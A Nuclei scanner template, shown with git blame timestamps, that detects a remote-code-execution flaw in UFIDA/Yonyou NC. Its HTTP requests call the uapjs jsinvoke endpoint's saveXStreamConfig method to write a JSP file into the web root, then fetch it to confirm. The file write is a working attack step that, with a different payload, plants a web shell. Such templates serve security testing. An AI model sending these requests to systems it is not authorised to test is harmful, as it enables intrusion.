nuclei-templates/http/cnvd/2023/CNVD-C-2023-76801.yaml

33 lines
1.0 KiB
YAML
Raw Normal View History

2023-09-17 08:51:38 +00:00
id: CNVD-C-2023-76801
2023-08-18 03:22:06 +00:00
info:
2023-09-17 08:51:38 +00:00
name: UFIDA NC uapjs - RCE vulnerability
2023-08-18 03:22:06 +00:00
author: SleepingBag945
severity: critical
2023-09-17 08:51:38 +00:00
description: There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.
metadata:
max-request: 2
2023-09-17 08:51:38 +00:00
tags: cvnd,cvnd2023,yonyou,rce
2023-08-18 03:22:06 +00:00
http:
- raw:
- |
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig",
"parameterTypes":["java.lang.Object","java.lang.String"],
"parameters":["{{randstr_2}}","webapps/nc_web/{{randstr_1}}.jsp"]}
2023-09-17 16:11:07 +00:00
2023-08-18 03:22:06 +00:00
- |
GET /{{randstr_1}}.jsp HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code_1 == 200
- status_code_2 == 200 && contains(body_2,"{{randstr_2}}")
condition: and